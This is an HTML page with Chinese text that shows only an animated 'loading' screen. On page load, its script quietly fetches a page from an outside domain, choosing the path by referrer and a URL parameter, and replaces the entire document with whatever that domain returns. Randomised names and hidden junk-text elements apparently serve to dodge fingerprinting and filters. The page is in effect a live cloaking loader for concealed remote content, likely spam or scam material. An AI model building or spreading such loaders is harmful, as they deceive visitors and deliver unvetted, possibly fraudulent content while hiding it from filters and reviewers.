<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ijLvMH {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ijLvMH .a6ZzbkJKtsU {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ijLvMH .content {
            line-height: 50px;
            text-align: center
        }

        .ijLvMH .img {
            width: 100%
        }

        .ijLvMH .s8Mn7b5 {
            text-align: center
        }

        .ijLvMH .s8Mn7b5 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ijLvMH .s8Mn7b5 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ijLvMH .s8Mn7b5 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ijLvMH .s8Mn7b5 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ijLvMH .s8Mn7b5 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ijLvMH .s8Mn7b5 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ijLvMH .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function OIZJaruAl41K(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var pkfdH9 = OIZJaruAl41K('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ pkfdH9 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ pkfdH9 +".html?a=share";
		}
		
        WxqMyi=url+"#"+new Date().getTime();
        WxqMyi && function() {
            $.get(WxqMyi, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<span style='display:none'>nbTajpOcJOJw1lS7ZYNIWY8zbuRVCZTrUjQUfsFIULLK5VsF</span>
<div style='display:none'>XmhhwlvK89C7tugKvDvGB8gE</div>
<p  style='display:none'>qM0wGvKSgv3QGOVWYWKHuMJUubZtzg9f38BchvUnMEJZqPS9SRv8nS5ARFvtNdALDbLfQUUJcpgJUJKkNfGY6KPYTRPmYuNv3m</p>
<a  href='#' style='display:none'>ZBgEsoSOEIFAVojge2CsBqEcgg65IuQCUe66KsuL3QXPXnj8</a>
<div style='display:none'>XmhhwlvK89C7tugKvDvGB8gE</div>
<div style='display:none'>XmhhwlvK89C7tugKvDvGB8gE</div>
<h1 style='display:none' >gZzcJU9GlFkomZRhuwhuh1sE86oY4yawKcf</h1><div class="ijLvMH">
    <div class="a6ZzbkJKtsU">
        <div class="s8Mn7b5">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >Gqs844PwJCk2ANpaDowwgR41hvXRc39ffZR1awd2e1OYbD3oDIjWP1kgxrFyI7k7SW0JmyHRB0YEe</h1>
<img  src='' style='display:none'>
<b style='display:none' >xtgliauXcNgzQx2ZLCmE</b>
<ul style='display:none' >q5UEs6zx75DNXsRBLEgVNa3BzHDn6UfNNJz8Hw60EepjlLB1p2TjhSJxxYDXNBl4XTxHdv76SizOElDuBMbvqtRj</ul>
<div style='display:none'>tcCXGAYvz5NRVZapbxMqM1R</div></body>
</html>